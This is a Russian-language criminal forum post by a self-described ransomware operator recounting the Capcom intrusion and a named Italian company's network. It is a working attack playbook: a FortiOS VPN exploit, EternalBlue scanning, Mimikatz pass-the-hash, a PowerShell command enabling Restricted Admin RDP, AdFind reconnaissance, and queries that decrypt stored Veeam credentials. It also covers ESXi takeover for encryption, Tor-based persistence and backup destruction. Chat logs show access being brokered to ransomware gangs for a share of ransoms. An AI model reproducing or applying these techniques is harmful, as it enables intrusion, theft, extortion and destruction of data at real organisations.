Вы думали, я вас не переиграю?

  • Автор темы Admin

Admin

#1
Администратор
Регистрация
31.12.2019
Сообщения
7,560
Реакции
36
Предисловие:
Прежде всего, в этом очерке, я хочу рассказать о том, что порог входа в пенетрирование сетей не такой высокий.
И, как не имея «0 дей» и «1 дей» - и даже не имея денег, можно нагнуть Capcom.

Осенью 2020 года мы нашли CVE-2018-13379.
Представляете, экслойт просто валялся на гите с 19 года- и его никто даже не пробывал использовать. А мы попробывали - но пришлось чутка доработать.
Как-то, в одну из ночей, кодер скинул новый материал с пометками. В одной из пометок я читаю: «capcom». По ходу какая доставка еды в японии - подумалось мне какая доставка???.
И я был приятно удивлен войдя в периметр.

b0ee755fc8d25ade38c66.png
0cb915deac9b67427a5ab.png


Ремарка: В конце текста, я проведу некей анализ рынка. Перед написанием статьи,
я специально искал выходы на приват пп. Мне удалось связаться с нефильмом и конти
Я выдал им по сети (те что сам не смог сделать ) и покажу вам что из этого вышло.

Все дело пенетрировалось на вирте вин сервер 2012

Сейчас эскплойт доступен в metasploit (search forti os)

Первоначальная разведка:
При подключении к впн- вам нужно обязательно снять роуты. Для этого был сляпан замечальнй скрипт, который их снимает и сканирует на уязвимости: «eternalblue» и «smbghost».

1. Укалдываем сканер на удобное место и
устанавливаем «Python 3 и nmap»;
2. Отрубаемся от впн;
3. Далее: cmd cd путь где валяються скрипы Python s.py - он снимает ваши роуты без подключения к впн и ждет появления новых;


Код:
C:\F>python s.py
[11:03:07][!] Parsing default routes ...
> 10.0.2.0/24
[11:03:07][*] Waiting for route changes ...
[11:03:08][*] Waiting for route changes ...
[11:03:09][*] Waiting for route changes ...
[11:03:10][*] Waiting for route changes ...
[11:03:11][*] Waiting for route changes ...
[11:03:12][*] Waiting for route changes ...
[11:03:13][*] Waiting for route changes ...
[11:03:14][*] Waiting for route changes ...
[11:03:15][*] Waiting for route changes ...

При подключении к Впн, он выполняет новые роуты и сам начнет их сканировать.

Код:
[11:04:55][+] Changes detected, following routes added:
> 10.60.0.0/16
> 10.70.0.0/16
> 10.80.0.0/16
> 10.90.0.0/16
> 10.209.174.0/23
> 10.249.0.0/16
> 172.16.0.0/16
> 192.168.2.0/23
> 192.168.255.0/26
[11:04:55][+] Launching multithreader scan ...

Жара пошла)))

Код:
11:04:55][+] Launching multithreader scan ...
10.90.1.3
10.80.72.19
10.249.2.37
10.249.2.38
10.249.2.42
10.249.2.43
10.90.1.6
> Vulnerable to EternalBlue!
> Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2
Standard 6.1)
10.80.72.20
> Vulnerable to EternalBlue!
> Windows Storage Server 2008 R2 Workgroup 7601 Service Pack 1 (Windows Stora
ge Server 2008 R2 Workgroup 6.1)
10.80.3.19
10.90.65.18
172.16.132.253
10.80.3.20
10.90.3.18

Hosts Vulnerable to EternalBlue (11):10.80.72.19, 10.90.1.6, 10.70.72.23, 10
0.24, 10.80.12.4, 10.80.47.4, 10.90.92.5, 10.249.52.89, 10.80.1.19, 10.80.1.
10.80.1.21

Неееереальная любовь реееально накрывала (*поет как Темникова)

026cf97fd62315060ecc2.png


В капкоме их было около 40 штук.
Для наглядного написания нашей статьи,
я взял в пример «циско впн» паркова в Италии.
https://mrkvpn.metropark.it/+CSCOE+/logon.html

Корпа с небольшим ревеню и хорошей ифраструктурой (как выяснилось позже - ужасной). Данная корпа очень схожа с инфраструктурой капкома (такой же пиздец в плане безопасности).
Читая лог сканер, я понимал: в капкоме мы будем жить очень долго и лить даты очень хорошо...
Нужно осмотреться. Как мы это называем на своем сленге- «гниды» (виртуалки для пентеста). После того, как осмотрелись - гнидануться в сеть.

Для этих целей я использую мячик(он же софтперфект нет сканер).

https://www.softperfect.com/

Открываем сканер прыгаем в опшенс и настраиваем примерно так же. Затем файл импорт ип лист хостейм. И вписываем туда роуты капков (метропарка любой другой компании)


67ec17e207667110610b5.png


048018dc1ef424e9bfa56.png


b8387b198a970e23a3b1f.png


b59b4f65318971983b233.png


981047d07427cfe142a73.png


Код:
10.0.2.0/24
10.60.0.0/16
10.70.0.0/16
10.80.0.0/16
10.90.0.0/16
10.209.174.0/23
10.249.0.0/16
172.16.0.0/16
192.168.2.0/23
192.168.255.0/26

Цитатка вспоминалась:

«А сегодня в завтрашний день не все могут смотреть. Вернее смотреть могут не только лишь все, мало кто может это делать». (C)

Мячик нам выдаст примерную структуру сети (ту которую видно с вашей гниды - мы пока еще не внутри сети). Так мы определяем примерное наличие доменов и домен контролеров.
Имея креды в домене, даже юзерские, мы легко можем пробить етернал - даже метосплотовскими силами.

Вам я дарю «eternalblack» - никому хуже не станет от того, что я тут его выложу.
Данная улита написана автором плейбит. Для более удобного эсплуатироания eternalblue. В работе я использовал чистый пейлоад метерпретера, но можно использовать и какой-нибудь легитимный dll для создания юзера.
Работает утилита так: ebb.exe 10.80.23.19 ip youpaload.

aae1826f4adbc0bfd5f5a.png


Сессия пришла. Первое, что нужно сделать: net group "Domain Admins /domain".

Это вернёт нам домен-админов; в капкоме их было около 15.

Наша задача найти либо хэш, либо клир пасс домен админа. Если вы пошли по пути создания совего локального юзера, то просто снимайте lsass дампы и пихайте в мимик.
К 10 тачке у меня таки был их домен админ - «adm_babak».
Кстати, в метропарке у нас тоже есть, да.

c4dbf115be2a3348e01dac07e149774c

Result:
Not Found, it is being cracked by our background system.
Please wait up to 5 days. A notification email will be sent to you when it is cracked successful , otherwise it is cracked failure.

Не беда! есть pth
PASS-THE-HASH ATTACKS. Если простым языком - это даст нам авторизоваться в системе по хешу.
Обязательно качаем псекс - через него мы будем заходить на сервак, и делать «рестрикт админ»- что бы ворваться в рдп.

sekurlsa::pth /user:administrator /domain:SD0603159 /ntlm:c4dbf115be2a3348e01dac07e149774c

Код:
C:\>p.exe \\10.80.23.19 cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Как мы видим, авторизовались без кредов. выполним

Код:
powershell.exe -nop -w hidden -ep bypass -c "New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force"

Исполнение этой команды на их хосте, дало нам возможность подписать mstsc хэшем и зайти без пасса.
Гуд…, подпишем mstsc - я грабил даже там, где не был.

sekurlsa::pth /user:administrator /domain:SD0603159 /ntlm:c4dbf115be2a3348e01dac07e149774c /run:"mstsc.exe /restrictedadmin"

И вот мы в периметре:

Есть такой замечательный инструмент - «Adfind» называеться. Качнуть его можно в гугле. Как установите - создайте рядом с ним батник, и закиньте на комп в их сети , тоесть в домене. Главное, потом не забыть удалить.

Код:
adfind.exe -f (objectcategory=person) > ad_users.txt даст юзеров этом домене
adfind.exe -f objectcategory=computer > ad_computers.txt компы в том числе и трупы
adfind.exe -subnets -f (objectCategory=subnet) | findstr ">cn: " > ad_subnets.txt доп подсети что не снелись софтом
adfind.exe -f "(objectcategory=group)" > ad_group.txt группы
adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt dc

На самом деле, в случаи метропарка, ситуация интересная: мы на контролере одного из доменов. В домене 2 компа, всего доменов около 30 штук - и все они имеют SD0603159, примерно вот такие название. И я уверен, что в каждом из них будет не более двух пк (это паркова 3 милиона ревеню).
*На самом деле, всё это не важно - я показываю метологию своей работы
Теперь нам нужно затянуть мячик на этот комп и просканировать сеть - уже из нутри домена. Это откроет полную картину сети. И тут мы плавненько переходим к поиску бекап систем файл-серверов и данных.

В течении пары часов была разложена вся структура capcom. Я выяснил, что за бекап систему отвечает «вис» (мы еще вернемся к нему и я покажу, как состилить пароли с вима). Данные лежат на насах,
вся корпа работает на 1 домене, а за инфраструктуру отвечает vmare esxi.

На тот момент, конечно, не было esxi. Решения у продукта, которым я лочил, поэтому сеть была накрыта изнутри (так делать не нужно) - если у вас сеть на esx,
вы лучше рвите жопу и ставьте esx.

Далее просиходили просто необъяснимые вещи: мы думали как нам не спалиться и скачать побольше даты.
Было выяснено, что админ Бабак - забытый богом админ. Я просто взял сервера у Редбира, поставил винspc и начал качать дату японцев. Вот тут началось самая жопа. Дату выбирали и качали мы месяца так полтора. 1тб - скорость выкачаки, была просто космос))) Все полтора месяца мы трясли башкой: «А вдруг придет пизда».
Но на вторую неделю я предложил дополнительно там закрепиться.
Я прокинуn рдп овер тор на 10 пк в сети.

https://qna.habr.com/q/703861

Прикладываю exe, который автоматически развернет вам рдв овер тор и сплюнет онион адрес, и можно будет подключаться по рдп через тор в сетку)
просто кликаете exe pass tor_socks.

На последней неделе перед атакой - впн отъебнулся и отвалились единсвенные креды в юсовом устрйовсе капкома. В раследовании они так и напишут - что мы зашли через Юсу.
Бекап-система капкома, как и почти в любой биллионой корпе, бекапила на съемные ленты и они вытаскивались (нам удалось уничтожить данные за 2 месяца).

*Кстати о стилинги паролей с вима:

1. зайдем на сам вим сервер качнем ssms https://docs.microsoft.com/en-us/sq...-management-studio-ssms?view=sql-server-ver15
2. Установим. Зачастую, потребуется ребут вим сервака. После ребута открываем «mssql managment studio», там авторизуемся под кредами нашего домен админа;
3. Выбираем базу данных Veeam;
4. И делаем такой запрос к этой бд:

Код:
SELECT TOP (1000) [id]
, [user_name]
, [password]
, [usn]
, [description]
, [visible]
, [change_time_utc]
FROM [VeeamBackup]. [Dbo]. [Credentials]

Это вернет нам все хэши и юзернейма с бекап системы. И это значит: и от всего, что там есть- от все структуры esx, насы и так далее.
Но теперь нужно расколоть эти пасы.
Без проблем, пацаны.

Открываем повершелл:

Код:
Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll"

Далее:

Код:
$encoded = 'тут хэш'

Код:
[Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded) вернет клир пасс

И вот мы собрали пароль от всего, что было в капкоме.

я хочу рассказать вам о своих недоработках, касаемо капкома, и как бы я сейчас сделал.
1)нанял бы инсдеров на работу с данными;
2)Уебал бы им вмвару вместе с гейм сервервами львиная доля,которых крутилась на линукс. Легло бы 400 тб данных на их esx.

Ну да ладно. По этому поводу я расскажу, как можно поработать с вмварой: сбросить пассы на esx, если их нет через вцентр.
В нашей ситуации, мы имеем креды от вцентра [email protected]
Заходим в вцентр и выбираем esx хост, жмакаем Configuration.
Authentication Services - Properties Join Domain. На хосте в домене наберем systeminfo - он выплюнет домен вот в таком формате как там. Вставляем в поле домен,
далее вводим креды домен админа без домена - тоесть без DOMAIN\
Всё.
Теперь идём на контролер домена, там октрываем юзеры и компьютеры- и делаем там группу ESX Admins. Добавляем туда своего юзера.
Теперь можно зайти на esx через веб. Сбросить рут юзеру, включить ssh, выключить вирты, удалить снеп шоты и шифрануть - и ав вам не страшен.

После слива данных с капкома началась эпопея с тем, куда же мне поставить такую корпу. На тот момент, я работал с распиздяем «Локбитом», которого я неделю просил кастомизоровать записку. И я сообщал, что буду ставить капком - не получил ни ответа - ни привета.
Затем, я обратился к господину аннону из «Ревиллов».
Взял эти ваши «ревилы» погонять - меня не устроило вообще всё: как работает локер, в первую очередь. И то, что он там дал интервью уже, что будет гейм корпу ставить. Кто он вообще такой, чтобы вести такие разговоры? Если эту корпа моя и ставить её буду я.
Я им указал на ошибки - они сказали, что всё исправят, но ничего не исправлялось.
На тот момент мы вели задушевные беседы с овнером «Рагнара». Просто душевная общуха. Я с ними до этого не работал. Ну и я ему закинул такую тему - естественно всё срослось, мы быстро все поставили и капки легли.

Причины их отказа платить я описал выше.
Но главной причиной является то, что префектура японии им просто запретила нам заплатить. Но я уверен: если бы мы соблюли два пункта, описанных выше - всё было бы ок.

Как я писал в предисловии к этой статье: перед написанием материла я сконтачился «нефильами» и «конти». Выдал им по сети, что сам не смог сделать (я всегда боялся брать сети в работу у других людей).
Знаете, такие вот страхи, что я не потяну и будут в мою сторону предъявы. Но, на самом деле, ситуации, которые сегодня произошли - меня очень приподняли.

Ники на форумах не «Конти» и «нефильма» я светить не буду - просто скину переписки.

*Диалог с нефильмами (как всегда все охуенно топовые команда):
Даю точку входа впн юзер в домене.
Сам до этого взял н число доменов там.’

и будут как бы тоже не простые все
9:24 я по сути даю то что сам
9:24 не потянул
нефильмы@vipclub.pm
9:24 давай нормальное)
9:24 у нас больше шансов на выплату
9:24 без обид)
9:24 ы

я@exploit.im
9:24 да баратн нормальное я сам наебну
9:24 хех
нефильмы@vipclub.pm
9:24 не дело в скиле

я@exploit.im
9:24 какие у вас в нефильме условия?
нефильмы@vipclub.pm
9:24 20% от выплаты твои
9:24 от 100%
9:24 локер наш

я@exploit.im
9:24 не в скиле дело?)
нефильмы@vipclub.pm
9:24 ну в скиле

я@exploit.im
9:24 тоесть если я сам свою сеть на ваш локер поставлю
нефильмы@vipclub.pm
9:24 у нас по докам сильные людяхи сидят

я@exploit.im
9:25 я получу 20 процентов
9:25 ?
нефильмы@vipclub.pm
9:25 тоесть ты даешь нам сеть мы лочим мы тебе 20% от выплаты
9:25 от 100%
9:25 типо дадут 1кк 200к твои

я@exploit.im
9:26 ну ок как то дам парочку) просто не вижу смысла давать то что самому можно сделать
9:26 проблема в том
9:26 что вы не хотите взять на локер
9:26 хех
9:26 ну давай как то попробуем
нефильмы@vipclub.pm
9:26 nt,t kjrt
9:26 tebe loker nado?
9:26 20% nam otdavai ya tebe vudam

я@exploit.im
9:26 esxi есть?
нефильмы@vipclub.pm
9:27 -
9:27 ты
9:27 каким
9:27 локером работаешоь?

я@exploit.im
9:28
9:28 короче там где есть esx
9:28 но
9:28 мне нужно что. Бы esx
9:28 работало без костылей
9:28 что бы от 5 до 7й
9:30 знаешь сегодняшня ситуация меня приподняла
9:30 где то я думал что скила у меня не так много
9:30 сегодня я понял
9:30 скил у меня есть XD
нефильмы@vipclub.pm
9:31 ))
9:31 да ладно сейчас много умных ребят

я@exploit.im
9:31 Было бы грустно
9:31 если бы ты поднялся там
9:31 а я нет
9:31 )
9:32


тут я передаю им креды от доменов в корпе
нефильмы@vipclub.pm
9:32 петух
9:32 и
9:32 петухи
9:32 отрубили
9:32 все линки впн и тд
9:32 эти айти)
9:32 нельзя зайти
9:32 мб поднимут рано или поздно
9:32 и креды подойдут)
9:33 ыыы
9:33 красава) че
9:33 этим же юзером?

я@exploit.im
9:33 ну там как минимум 2 зерелогона
нефильмы@vipclub.pm
9:34 удар по самолюбию сейчас я буду наблюдать)

я@exploit.im
9:34 как минимум 6 етерналов
9:34 )
нефильмы@vipclub.pm
9:34 делать ее дальше?

я@exploit.im
9:34 ну ты же сказал
9:34 она упала
нефильмы@vipclub.pm
9:34 не я имел ввиду

я@exploit.im
9:34 делай я дал что было у меня
нефильмы@vipclub.pm
9:34 я через линки

я@exploit.im
9:34 это их клиенты
нефильмы@vipclub.pm
9:34 впны
9:34 да она работает

я@exploit.im
9:34 а нужен оснвоной домен
9:34 ихз
нефильмы@vipclub.pm
9:34 форти

я@exploit.im
9:34 там esxi
нефильмы@vipclub.pm
9:34 я имел ввиду

я@exploit.im
9:34 кластера
нефильмы@vipclub.pm
9:35 у них есть цитриксы и впны но они отключены

я@exploit.im
9:35 нужно врываться в домен TA
нефильмы@vipclub.pm
9:35 мб юзеры бы подошли

я@exploit.im
9:35 без 0 деев
9:35 там делать нехуй
9:35 у меня их нет
9:35 в TA Своим арсеналом я не попал
нефильмы@vipclub.pm
9:36 понял

я@exploit.im
9:36 креды стилить с вима умеешь?
нефильмы@vipclub.pm
9:36 я админ просто мне это все даже не интересно

я@exploit.im
9:37 локер интересно мне
нефильмы@vipclub.pm
9:37 я свое от сидел отдрочил 2 года назад)

я@exploit.im
9:37 больше чем твои пентестеры)
9:37 сорян)
нефильмы@vipclub.pm
9:37 ну смотри
9:37 мы можем предоставить
9:37 20% от выплаты нам, даешь мне заранее ав и почты
9:37 3 разных
9:37 в блоге будем размещать
9:37 если что


нефильмы@vipclub.pm
9:39 % kakoi ho4esh

я@exploit.im
9:39 это все зависит от суммы
9:39 можно и 40
9:39 если сумма ок
9:40 динамику
9:40 хочу
нефильмы@vipclub.pm
9:40 взять все не проблема)
9:40 и все самим сделать4



я@exploit.im
9:40 нефильмы@vipclub.pm
9:40

взять все не проблема)
9:40

и все самим сделать4
9:40 ну вот я дал тебе взять)
9:40 то что вы возьмете
9:40 я возьму тоже)
9:40 мне то какой толк
9:40 нихуя не делать я тоже не хочу
9:40 мне как бы нравиться
9:40 сетки ебашить
нефильмы@vipclub.pm
9:40 )))
9:41 дак можно и так и так)
9:41 и сам делать давать и давать что бы делали)
9:41 тоже сидеть никто нех очет)
9:41 в этом и прикол)

я@exploit.im
9:41 ну вот пердай своим что я дал
нефильмы@vipclub.pm
9:42 к
9:42 сек
9:42 никого нету завтра скину хочу сгеодня отдохнуть 4 дня не высыпался

я@exploit.im
9:42 отдыхай
9:42 )
9:43 знашеь никогда не радовался так тому что с корпой ничего не вышло
9:43 х#й знает
9:43 ахахах
9:43 приподняло
9:43 очень
нефильмы@vipclub.pm
9:43 думаю сейчас
9:43 зайдет кто дам
нефильмы@vipclub.pm
9:54 дал
9:54 ее

я@exploit.im
9:54 окей
9:54 )
нефильмы@vipclub.pm
9:55 удар по самолюбию
9:55 только что был)
9:55 хД
9:55 расслабились че то)

я@exploit.im
9:55 это по пентестерам твоим удар)
9:55 ты же просто админ
нефильмы@vipclub.pm
9:55 да мне терь интересно буду говорить ты не смог а он смог)
9:55 подьебывать)
9:56 поток сеток организуешь?)

я@exploit.im
9:56 ну я тебе уже сказал есть инетрес сови сети ставить условия я тоже тебе описал
9:56 если у вас крутые такие челы по дате
9:56 то что бы нет
нефильмы@vipclub.pm
9:56 30% и то я поговорю еще
9:57 может не соглас будет ну я уверен что не согласятся

я@exploit.im
9:57 дело их) мне как то похую)


я@exploit.im
10:06 Нужно жить настоящим и думать о будущем
нефильмы@vipclub.pm
10:06 да я вот думаю ))
нефильмы@vipclub.pm
10:13 взяли
10:13 ДА
10:13 хД
10:13 пишет спрашивает как ты это сделал)


я@exploit.im
10:14 и corporate
нефильмы@vipclub.pm
10:14 спрашивает
10:14 как ты это сделал
10:14 вообще
10:14 странно все перепробовали

я@exploit.im
10:14 ну как мимнимум скажи что там зерелогон
10:14 и 6 етернал блу
10:15 А сегодня в завтрашний день не все могут смотреть. Вернее смотреть могут не только лишь все, мало кто может это делать.
10:15 (С)
10:15 ) и да я вам дал в тех доменах которые сам взял
нефильмы@vipclub.pm
10:15 ща попадет
10:15 )
10:16 а в другие же не попадешь

я@exploit.im
10:17 без 0 деев врятли
10:17 еще
нефильмы@vipclub.pm
10:17 есть
10:17 0

я@exploit.im
10:17 vsphere.local
10:17 это вцентер
10:17 их
10:17 он на винде
10:17 в домене
10:18 vsphere.local
10:18 вам еще туда
10:18 )
10:18 попробуйте
нефильмы@vipclub.pm
10:20 дак его не видно

я@exploit.im
10:20 должно быть видно
10:20 роуты проскань
10:20 те что я скинул
нефильмы@vipclub.pm
10:20 к
10:20 ща сек
10:20 а все понял
10:21 это я кароч завтра дам инфу я спать

я@exploit.im
10:21 давай)
10:21 ты наврено с мыслями пойдешь нахуй вообще со мной связался
10:21 азахахаха
нефильмы@vipclub.pm
10:21 не
10:21 ы
10:21 он подьтянет
10:21 ща
10:22 сейчас они пусть ебутся
10:22 завтра после обеда будешь?

я@exploit.im
10:23 Да все лето буду почти всегда онлайн
нефильмы@vipclub.pm
10:23 ок завтра спишемся) поору

я@exploit.im
10:23 главное что бы не поорал)
нефильмы@vipclub.pm
10:23 такой удар по гордости))

я@exploit.im
10:23 еще сильней
нефильмы@vipclub.pm
10:23 =)))
10:23 до завтра бро

я@exploit.im
10:24 пока
нефильмы@vipclub.pm
10:24 черкани мне наф оруме в лс что бы не потерялся конаткт на всякий

я@exploit.im
10:25 дай линк
10:25 на профиль
10:25 а все
10:25 фарнетворк
10:25 да я помню
10:35 Статус: Auto Status (idle)

Как мы видим из переписки: админ этого «нефильма» ушёл спать очень недовольный своими пентестерами.

*А вот с конти:

conti
10:16 ага ну пока что в работе
10:16 они пропаченные там

я
10:16 я это знаю мужик
10:16 в целом от меня будут такие сети
10:16 так как там где могу я сам
10:16 у меня выходит
10:16 там где не вышло у меня
conti
10:16 мне самому интересно сам наверное подключусь )

Если их "команды" называются топовыми,
то кто тогда я?



Теперь давайте поговорим за команды команд АПТ ДТП ПТУ Хуиту.

Наша команда: кодер-питонист (кто собственно все эти паблики допиливал),
второй пентестер (мой ученик), третий пентестер-подмастерье (на тот момент принеси-подай), ну и собственно я.
Короче: Борис, Крюк, Биба и печник- вот и вся наша команда.
Лучше всех было Крюку- он получал ровную долю с проставок и сидел на жопе ровно. Мы же отрабатывали пульсы и фортики.
Я всегда говорил: пацаны, ищем выходы на 0 деи. Деньги есть - большие деньги. Но вся команда ныла: фортики фортики фортики, их на всю жизнь хватит…
Конечно, никто ничего не искал. Приходилось заниматься всем самому. Проблема в том, что я считал их «мои пацаны». А это бизнес - суровый бизнес. Здесь «моих пацанов» не существует. Если работают плохо и планы не совпадают- значит уже «не мои».
Нужно было их просто выдрачивать так, чтобы делали только то, что я им говорю.

Так что лучше работайте в одиночку, либо руководите умело. Сейчас я пошёл по пути работы в одного. И, знаете, кпд не упало, а только выросло. Откинул от себя ненужные контакты и ненужных мне людей.

Подводя итоги статьи, могу сказать, что пентест сетей не такой уж сложный процесс для изучения. Сложно этому кого-то учить (если изначально человек в теме на уровне ноль).
Так как вариантов решения одной задачи может быть масса. Но, в первую очередь, вам нужно влюбиться в пентест.
Ну как и в любую другую работу (а иначе это насилие над собой, а не работа).
Все методы, описанные мной, есть в гугле - на официальных сайтах продуктов.
Читайте больше обзоров аверов, читайте их Твитеры. Часто они описывают полную методологию какой-либо из атак.

P.S: Что касается метропарка - это обычный паркинг с данными камер. Поэтому далее его смотреть я не стал.
P.P.S: Вот вы гоните нас ссаной тряпкой: рансомщики - *************************асы. А мы есть будущее, прогнали нас отсюда - не беда
я строю уютный дом для нас...

*Выражаю особую благодарность овнеру рагнара - ты лютый чел, Спасибо тебе за то, что мы с тобой общались. И Unit8200 за то, что когда я начал интересоваться темой, ты мне сказал: «Иди нахуй, учись сам- есть гугл». Спасибо и тебе от души.

Инструменты:

Автор: boriselcin
 

Members, viewing this thread

Сейчас на форуме нет ни одного пользователя.